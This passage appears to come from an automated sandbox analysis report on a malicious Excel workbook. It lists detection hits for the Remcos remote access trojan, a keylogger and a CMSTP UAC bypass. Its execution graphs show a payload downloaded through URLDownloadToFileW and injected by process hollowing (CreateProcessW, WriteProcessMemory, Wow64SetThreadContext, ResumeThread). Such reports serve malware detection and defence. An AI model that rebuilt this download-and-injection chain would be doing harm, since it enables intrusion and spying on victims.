                                                                                                                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001F.00000002.508079341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001F.00000002.508079341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001F.00000002.508079341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001F.00000002.508079341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                              • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001F.00000002.508079341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000001F.00000002.508079341.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                              • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001F.00000002.509094010.0000000000551000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                              Has exited:true

                                                                                                                                                                              Call Graph


                                                                                                                                                                              Module: Sheet1

Declaration
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                                                                                                                              Module: Sheet2

Declaration
Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                                                                                                                              Module: Sheet3

Declaration
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                                                                                                                              Module: ThisWorkbook

Declaration
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000004.00000003.427841120.0000000002920000.00000010.00000800.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_4_3_2920000_mshta.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                                                                • Instruction ID: c4716784dfd662206c076e8d1dab569b69fb71c1c264b4c67e3a53f6b3e38811
                                                                                                                                                                                • Opcode Fuzzy Hash: 5b6f7839063d9ef41bdfbe4116d10e7f1b6142974b10c5c3148811bafbd638da
                                                                                                                                                                                • Instruction Fuzzy Hash:

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:3.8%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                Signature Coverage:50%
                                                                                                                                                                                Total number of Nodes:6
                                                                                                                                                                                Total number of Limit Nodes:0
                                                                                                                                                                                execution_graph 2648 7fe899b4ab5 2649 7fe899b4ac1 URLDownloadToFileW 2648->2649 2651 7fe899b5b00 2649->2651 2640 7fe899b59e1 2641 7fe899b59f1 URLDownloadToFileW 2640->2641 2643 7fe899b5b00 2641->2643

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                control_flow_graph 142 7fe899b4ab5-7fe899b4abf 143 7fe899b4b01-7fe899b5aa1 142->143 144 7fe899b4ac1-7fe899b4ad5 142->144 148 7fe899b5aab-7fe899b5ab1 143->148 149 7fe899b5aa3-7fe899b5aa8 143->149 144->143 150 7fe899b5abb-7fe899b5afe URLDownloadToFileW 148->150 151 7fe899b5ab3-7fe899b5ab8 148->151 149->148 152 7fe899b5b06-7fe899b5b23 150->152 153 7fe899b5b00 150->153 151->150 153->152
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.459710178.000007FE899B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7fe899b0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 63e6f3d9f6cdb99b28ced783df5c6c1d26113f699d22d59d7297854860be396d
                                                                                                                                                                                • Instruction ID: e4d46c5b68b7e8eacdd1d90594ab6e024db077ebece774c9529a0acc32575742
                                                                                                                                                                                • Opcode Fuzzy Hash: 63e6f3d9f6cdb99b28ced783df5c6c1d26113f699d22d59d7297854860be396d
                                                                                                                                                                                • Instruction Fuzzy Hash: 0941E23190CB984FD719DB589C897E9BBF0FB55310F0482AFD04DD7162CA74A806CB92

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.459782866.000007FE89A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A80000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7fe89a80000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 88M$88M$88M$88M$8hT$8hT$8hT$8hT
                                                                                                                                                                                • API String ID: 0-1541320209
                                                                                                                                                                                • Opcode ID: 1f83f2931ab0565ea96a4336c1d5ab34f20685f04ff56a8cb9dc89b52b61a62c
                                                                                                                                                                                • Instruction ID: e0fa3f7919cc77ee6602d2490e7392910e47c11ccf0e5ebcce71af8ca074e034
                                                                                                                                                                                • Opcode Fuzzy Hash: 1f83f2931ab0565ea96a4336c1d5ab34f20685f04ff56a8cb9dc89b52b61a62c
                                                                                                                                                                                • Instruction Fuzzy Hash: 86720730A1CB854FDB59EB2C8894A757BE1EF56340F1841EED48ED72A3DA24EC45C781

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                control_flow_graph 126 7fe899b59e1-7fe899b59ef 127 7fe899b59f2-7fe899b5a05 126->127 128 7fe899b59f1 126->128 129 7fe899b5a07 127->129 130 7fe899b5a08-7fe899b5a19 127->130 128->127 129->130 131 7fe899b5a1b 130->131 132 7fe899b5a1c-7fe899b5aa1 130->132 131->132 136 7fe899b5aab-7fe899b5ab1 132->136 137 7fe899b5aa3-7fe899b5aa8 132->137 138 7fe899b5abb-7fe899b5afe URLDownloadToFileW 136->138 139 7fe899b5ab3-7fe899b5ab8 136->139 137->136 140 7fe899b5b06-7fe899b5b23 138->140 141 7fe899b5b00 138->141 139->138 141->140
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.459710178.000007FE899B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7fe899b0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DownloadFile
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1407266417-0
                                                                                                                                                                                • Opcode ID: eccb5d4efdd9d821339d51415183fc3a6ca4cb2d8cb12961b40f8134c3fb33e0
                                                                                                                                                                                • Instruction ID: 777315a8379273862214977f4159bba84b37a095e6150f6c079ad4062ad424ff
                                                                                                                                                                                • Opcode Fuzzy Hash: eccb5d4efdd9d821339d51415183fc3a6ca4cb2d8cb12961b40f8134c3fb33e0
                                                                                                                                                                                • Instruction Fuzzy Hash: BB41F37181DB989FDB19EB589C447A9BBF0FB56321F04826FD08DD3162CB286806C782

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                control_flow_graph 154 7fe899b4afc-7fe899b5aa1 159 7fe899b5aab-7fe899b5ab1 154->159 160 7fe899b5aa3-7fe899b5aa8 154->160 161 7fe899b5abb-7fe899b5afe URLDownloadToFileW 159->161 162 7fe899b5ab3-7fe899b5ab8 159->162 160->159 163 7fe899b5b06-7fe899b5b23 161->163 164 7fe899b5b00 161->164 162->161 164->163
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.459710178.000007FE899B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7fe899b0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: DownloadFile
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 1407266417-0
                                                                                                                                                                                • Opcode ID: d98df72395ff977c5e09bb1534dfc30c7abc4c4684f75e9b01a871e9f943f9ed
                                                                                                                                                                                • Instruction ID: 71d44ac0b58f89976c3b3d06f41d2ef85568ee3998077458df01ad303f9f7a1e
                                                                                                                                                                                • Opcode Fuzzy Hash: d98df72395ff977c5e09bb1534dfc30c7abc4c4684f75e9b01a871e9f943f9ed
                                                                                                                                                                                • Instruction Fuzzy Hash: 5441A13190CB9C4FDB19DB5898857A9BBF0FB59320F04826FD04DD3162DB74A846CB92

                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.459782866.000007FE89A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A80000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7fe89a80000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 8hT
                                                                                                                                                                                • API String ID: 0-3237309121
                                                                                                                                                                                • Opcode ID: 6ccfa9d6ddf2b25bdae726e0d9ca0561762f4374cfd27ae0fc164becdf1629de
                                                                                                                                                                                • Instruction ID: b49126e815d93afd3a545300eb52200b589bb1d431efac254077fa38fdcafbe1
                                                                                                                                                                                • Opcode Fuzzy Hash: 6ccfa9d6ddf2b25bdae726e0d9ca0561762f4374cfd27ae0fc164becdf1629de
                                                                                                                                                                                • Instruction Fuzzy Hash: 8721BC0060D7CA1FE347937C1950265BFD2DF8B658B2910EBD58ED71A3D9454C6AC361

                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 00000005.00000002.459782866.000007FE89A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A80000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_5_2_7fe89a80000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: 398b876c7e50061e0ecbd5779dc0b2728796dd758746ff4f75235fa64512da67
                                                                                                                                                                                • Instruction ID: 36af2df8b3723615df37d14196fa03d76aeed2313c62f70f0c4a3b4b8c8c0205
                                                                                                                                                                                • Opcode Fuzzy Hash: 398b876c7e50061e0ecbd5779dc0b2728796dd758746ff4f75235fa64512da67
                                                                                                                                                                                • Instruction Fuzzy Hash: E622D23090CB894FD799EB2C84506797FE2FF9A344F2401EAD48ED72A2DA25AC55C741

                                                                                                                                                                                Execution Graph

                                                                                                                                                                                Execution Coverage:4%
                                                                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                Signature Coverage:0%
                                                                                                                                                                                Total number of Nodes:15
                                                                                                                                                                                Total number of Limit Nodes:0
                                                                                                                                                                                execution_graph 6540 7fe899bf0dd 6541 7fe899bf162 CreateProcessW 6540->6541 6543 7fe899bf3a3 6541->6543 6544 7fe899bd8a6 6545 7fe899bd8ad 6544->6545 6547 7fe899bd1b4 6545->6547 6548 7fe899b8178 6545->6548 6549 7fe899bf4f0 Wow64SetThreadContext 6548->6549 6551 7fe899bf583 6549->6551 6551->6547 6552 7fe899bf7b4 6553 7fe899bf7bd WriteProcessMemory 6552->6553 6555 7fe899bf8a1 6553->6555 6556 7fe899bf975 6557 7fe899bf9a0 ResumeThread 6556->6557 6559 7fe899bfa1b 6557->6559

                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.532872591.000007FE89A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A80000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7fe89a80000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: XhT$r6R$r6R
                                                                                                                                                                                • API String ID: 0-1736375273
                                                                                                                                                                                • Opcode ID: 74e1c44a199ea00ee0ee709221366836dc4d38513c5b38fdad86c823f1ab71d4
                                                                                                                                                                                • Instruction ID: b1c020b23080d24c8e3fc9022d1aaa3928cd141b1bce5921b33957bb957b529f
                                                                                                                                                                                • Opcode Fuzzy Hash: 74e1c44a199ea00ee0ee709221366836dc4d38513c5b38fdad86c823f1ab71d4
                                                                                                                                                                                • Instruction Fuzzy Hash: 02323420A0DBDA0FE757A73858642B57FE1EF87254F1901EBC08ED71A3DA18AC59C351
                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.532872591.000007FE89A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A80000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7fe89a80000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: (U[$(U[$(U[$(U[$(U[$(U[$r6R$r6R
                                                                                                                                                                                • API String ID: 0-3137147385
                                                                                                                                                                                • Opcode ID: 96ac6b7a05fba723e17a0e31ae6bca78c7713ec07a44c9a292d1397873025f72
                                                                                                                                                                                • Instruction ID: c68bbe1f0d3f1530a343c33eb87c6b86d35c35fd3c5dc105989dbdaf073857dd
                                                                                                                                                                                • Opcode Fuzzy Hash: 96ac6b7a05fba723e17a0e31ae6bca78c7713ec07a44c9a292d1397873025f72
                                                                                                                                                                                • Instruction Fuzzy Hash: 0162353090DBDA0FE35AA72858512B97FE1EF47254F1901EBD48FE71A3E618AC16C352

                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.532872591.000007FE89A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A80000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7fe89a80000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: 8hT$8hT$8hT$8hT
                                                                                                                                                                                • API String ID: 0-3692472035
                                                                                                                                                                                • Opcode ID: d9441e636ad48c72b08e4df708bfcc8437b13710f25dc6875fc6964a4af90ada
                                                                                                                                                                                • Instruction ID: 9fc223181f619a35058b4902b7cf127959faeefe7f5d1e2c4104573ad97569cb
                                                                                                                                                                                • Opcode Fuzzy Hash: d9441e636ad48c72b08e4df708bfcc8437b13710f25dc6875fc6964a4af90ada
                                                                                                                                                                                • Instruction Fuzzy Hash: 71221220A1D7CA0FE747A73848646B57FE1EF47248F1901EBD48DDB1A3D618AC5AC362

                                                                                                                                                                                Strings
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.532872591.000007FE89A80000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE89A80000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7fe89a80000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID: (be$XhT
                                                                                                                                                                                • API String ID: 0-1561679238
                                                                                                                                                                                • Opcode ID: 051b7336f5b5691c153a8e336ad87a74527adf9e3c3c659b0c9455c3c007b944
                                                                                                                                                                                • Instruction ID: b4df0783e64b1d1f504dc54a94112a5a6c48932c1c54a0bd67a0828bc3b48d66
                                                                                                                                                                                • Opcode Fuzzy Hash: 051b7336f5b5691c153a8e336ad87a74527adf9e3c3c659b0c9455c3c007b944
                                                                                                                                                                                • Instruction Fuzzy Hash: 21C1F520A1DBCA0FE747A73858242797FE1EF87654F1900EBD49ED72A3D918AC15C362

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 483 7fe899bf0dd-7fe899bf160 484 7fe899bf162-7fe899bf171 483->484 485 7fe899bf17f-7fe899bf24d 483->485 486 7fe899bf17c-7fe899bf17d 484->486 487 7fe899bf173-7fe899bf17b 484->487 490 7fe899bf25f-7fe899bf264 485->490 491 7fe899bf24f-7fe899bf25c 485->491 486->485 487->486 492 7fe899bf266-7fe899bf276 490->492 493 7fe899bf282-7fe899bf2ad 490->493 491->490 492->493 494 7fe899bf278-7fe899bf280 493->494 495 7fe899bf2af-7fe899bf2c3 493->495 496 7fe899bf2c6-7fe899bf3a1 CreateProcessW 494->496 495->496 498 7fe899bf3a9-7fe899bf435 call 7fe899bf436 496->498 499 7fe899bf3a3 496->499 499->498
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.532490565.000007FE899B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7fe899b0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID:
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID:
                                                                                                                                                                                • Opcode ID: fbdd69a3234632d9b347162d8c7d13197b21dfd5a5a815211abc2fda8bfd467b
                                                                                                                                                                                • Instruction ID: e48eaa575483dac73379555dc0749d87ab00f5bcb05e63fc10728f61007076a8
                                                                                                                                                                                • Opcode Fuzzy Hash: fbdd69a3234632d9b347162d8c7d13197b21dfd5a5a815211abc2fda8bfd467b
                                                                                                                                                                                • Instruction Fuzzy Hash: B8C1C47180CB988FDB56DF68D855AD97BF0FF5A310F0442DBD089D72A2CA34A985CB81

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 506 7fe899b8158-7fe899bf24d 509 7fe899bf25f-7fe899bf264 506->509 510 7fe899bf24f-7fe899bf25c 506->510 511 7fe899bf266-7fe899bf276 509->511 512 7fe899bf282-7fe899bf2ad 509->512 510->509 511->512 513 7fe899bf278-7fe899bf280 512->513 514 7fe899bf2af-7fe899bf2c3 512->514 515 7fe899bf2c6-7fe899bf3a1 CreateProcessW 513->515 514->515 517 7fe899bf3a9-7fe899bf435 call 7fe899bf436 515->517 518 7fe899bf3a3 515->518 518->517
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.532490565.000007FE899B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7fe899b0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: CreateProcess
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 963392458-0
                                                                                                                                                                                • Opcode ID: 900a4da365c21c7469615d964c8e08e77e5b461256521087859298ca3c3578ca
                                                                                                                                                                                • Instruction ID: 9384d40efcf7e4a77a1556ee3d24d66a40ef6b1476b3ae3fb1cdf9d812642f1c
                                                                                                                                                                                • Opcode Fuzzy Hash: 900a4da365c21c7469615d964c8e08e77e5b461256521087859298ca3c3578ca
                                                                                                                                                                                • Instruction Fuzzy Hash: DB916A31918A5C8FDBA5EF58D845BEDBBF1FB58310F10429AD44DE3261CB30A9858B81

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 525 7fe899bf7b4-7fe899bf7bb 526 7fe899bf7bd-7fe899bf7c5 525->526 527 7fe899bf7c6-7fe899bf850 525->527 526->527 530 7fe899bf85a-7fe899bf89f WriteProcessMemory 527->530 531 7fe899bf852-7fe899bf857 527->531 532 7fe899bf8a7-7fe899bf8d1 530->532 533 7fe899bf8a1 530->533 531->530 533->532
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.532490565.000007FE899B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7fe899b0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3559483778-0
                                                                                                                                                                                • Opcode ID: 489ba237530a7151695a89e28b0b4ef8ba2f7477fe3fa90fad41962735377ee1
                                                                                                                                                                                • Instruction ID: 3bec29120de6414ac5073d910b2e0766f4ad75c44c733ad7d139dd80565a3ecc
                                                                                                                                                                                • Opcode Fuzzy Hash: 489ba237530a7151695a89e28b0b4ef8ba2f7477fe3fa90fad41962735377ee1
                                                                                                                                                                                • Instruction Fuzzy Hash: AA31F73191CB588FDB18EF5898467F97BE0FB99321F04426FE089D3252CB74A845CB91

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 534 7fe899bf4a5-7fe899bf4b1 535 7fe899bf4bc-7fe899bf545 534->535 536 7fe899bf4b3-7fe899bf4bb 534->536 539 7fe899bf547-7fe899bf54c 535->539 540 7fe899bf54f-7fe899bf581 Wow64SetThreadContext 535->540 536->535 539->540 541 7fe899bf589-7fe899bf5b0 540->541 542 7fe899bf583 540->542 542->541
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.532490565.000007FE899B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7fe899b0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ContextThreadWow64
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 983334009-0
                                                                                                                                                                                • Opcode ID: 914f919407c7e3d2f43964d712163f4889451bd658c67a56aa8003105c0245f7
                                                                                                                                                                                • Instruction ID: 11348a86ca04f241276b6bc14d1b2b072d2ce84e4bdf13aa68680aa79d6e820c
                                                                                                                                                                                • Opcode Fuzzy Hash: 914f919407c7e3d2f43964d712163f4889451bd658c67a56aa8003105c0245f7
                                                                                                                                                                                • Instruction Fuzzy Hash: 5D41E63190C7988FDB16DF6898457E97FE0EB56321F08429BD488C7167D764A809CB92

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 543 7fe899b81b8-7fe899bf850 546 7fe899bf85a-7fe899bf89f WriteProcessMemory 543->546 547 7fe899bf852-7fe899bf857 543->547 548 7fe899bf8a7-7fe899bf8d1 546->548 549 7fe899bf8a1 546->549 547->546 549->548
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.532490565.000007FE899B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7fe899b0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: MemoryProcessWrite
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 3559483778-0
                                                                                                                                                                                • Opcode ID: 83d5a8b3c634013bd8e19374531f16d52604cc15059c24a5d38e11bbc63db9d6
                                                                                                                                                                                • Instruction ID: 8334733f2134a4955b72e5936b6c7466738bc5c3348bf2bd9ea9a5cbd16ed6d4
                                                                                                                                                                                • Opcode Fuzzy Hash: 83d5a8b3c634013bd8e19374531f16d52604cc15059c24a5d38e11bbc63db9d6
                                                                                                                                                                                • Instruction Fuzzy Hash: CA31B23191CB588FDB18EF5C98466FD7BE4FBA9711F00426FE08AD3251CB74A8458B91

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 550 7fe899b8178-7fe899bf545 553 7fe899bf547-7fe899bf54c 550->553 554 7fe899bf54f-7fe899bf581 Wow64SetThreadContext 550->554 553->554 555 7fe899bf589-7fe899bf5b0 554->555 556 7fe899bf583 554->556 556->555
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.532490565.000007FE899B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7fe899b0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ContextThreadWow64
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 983334009-0
                                                                                                                                                                                • Opcode ID: bc772a59aa2ed217b10fdcdfcb557d8f8c9129397939db76159e6e2507a841fa
                                                                                                                                                                                • Instruction ID: fb3644dffdb45a8e45bbbe6db467dfdffd097795214262186cd5113124c7d2c8
                                                                                                                                                                                • Opcode Fuzzy Hash: bc772a59aa2ed217b10fdcdfcb557d8f8c9129397939db76159e6e2507a841fa
                                                                                                                                                                                • Instruction Fuzzy Hash: CB31E33190CB1C8FDB54DF9C98897EA7BE1FBA9720F04825BD449C3126DB74A8068B91

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 557 7fe899bf975-7fe899bfa19 ResumeThread 560 7fe899bfa1b 557->560 561 7fe899bfa21-7fe899bfa3d 557->561 560->561
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.532490565.000007FE899B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7fe899b0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ResumeThread
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 947044025-0
                                                                                                                                                                                • Opcode ID: db7547fb1f68b04ebffe80ce66133e6512e94cf167191dd85e2f9cf952482528
                                                                                                                                                                                • Instruction ID: 18ac01efd878b778c0fa5bc665c707a292e81859c62cc39bede35fbc256e4afd
                                                                                                                                                                                • Opcode Fuzzy Hash: db7547fb1f68b04ebffe80ce66133e6512e94cf167191dd85e2f9cf952482528
                                                                                                                                                                                • Instruction Fuzzy Hash: 6721F37190CA4C9FDB59DB58D84ABF97BE0EBA6320F00421FD089C3662C7606856CB91

                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                • Executed
                                                                                                                                                                                • Not Executed
                                                                                                                                                                                control_flow_graph 562 7fe899b81e8-7fe899bfa19 ResumeThread 565 7fe899bfa1b 562->565 566 7fe899bfa21-7fe899bfa3d 562->566 565->566
                                                                                                                                                                                APIs
                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                • Source File: 0000000E.00000002.532490565.000007FE899B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 000007FE899B0000, based on PE: false
                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                • Snapshot File: hcaresult_14_2_7fe899b0000_powershell.jbxd
                                                                                                                                                                                Similarity
                                                                                                                                                                                • API ID: ResumeThread
                                                                                                                                                                                • String ID:
                                                                                                                                                                                • API String ID: 947044025-0
                                                                                                                                                                                • Opcode ID: 87c8d6cb1827c8dd3dd44969ae51cc6f9c0cfb0487dac7b18db8df0bc9f3eca6
